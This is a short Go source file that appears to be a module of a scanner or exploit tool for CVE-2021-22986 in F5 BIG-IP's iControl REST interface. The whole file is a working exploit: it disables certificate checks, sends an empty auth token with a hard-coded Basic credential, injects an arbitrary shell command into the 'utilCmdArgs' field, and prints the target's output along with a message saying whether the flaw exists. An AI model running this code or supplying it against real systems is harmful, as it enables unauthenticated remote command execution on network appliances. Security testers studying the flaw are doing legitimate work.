CVE-2021-22986.go

package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)

func Cve_2021_22986() {
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{
			InsecureSkipVerify: true,
		},
	}

	client := &http.Client{Transport: tr}
	//client := &http.Client{Timeout: time.Second * 10}
	req, err := http.NewRequest("POST", url+filepath1, strings.NewReader("{\"command\":\"run\",\"utilCmdArgs\":\"-c "+c+"\"}"))
	if err != nil {
	}
	req.Header.Add("X-F5-Auth-Token", "")
	req.Header.Add("Authorization", "Basic YWRtaW46QVNhc1M=")
	req.Header.Add("Upgrade-Insecure-Requests", "1")
	req.Header.Add("Cache-Control", "max-age=0")
	req.Header.Add("Accept-Language", "ja,zh-CN;q=0.8,zh;q=0.6")
	req.Header.Add("Connection", "close")
	req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0")
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer resp.Body.Close()
	body, err1 := ioutil.ReadAll(resp.Body)
	if err1 != nil {
		fmt.Println(err1)
		return
	}
	if resp.StatusCode == 200 {
		fmt.Println("StatusCode:", resp.StatusCode, "CVE-2021-22986漏洞存在")
		fmt.Printf("%s\n", c)
		fmt.Println(string(body))
	} else {
		fmt.Println("StatusCode:", resp.StatusCode, "CVE-2021-22986漏洞不存在")
	}
}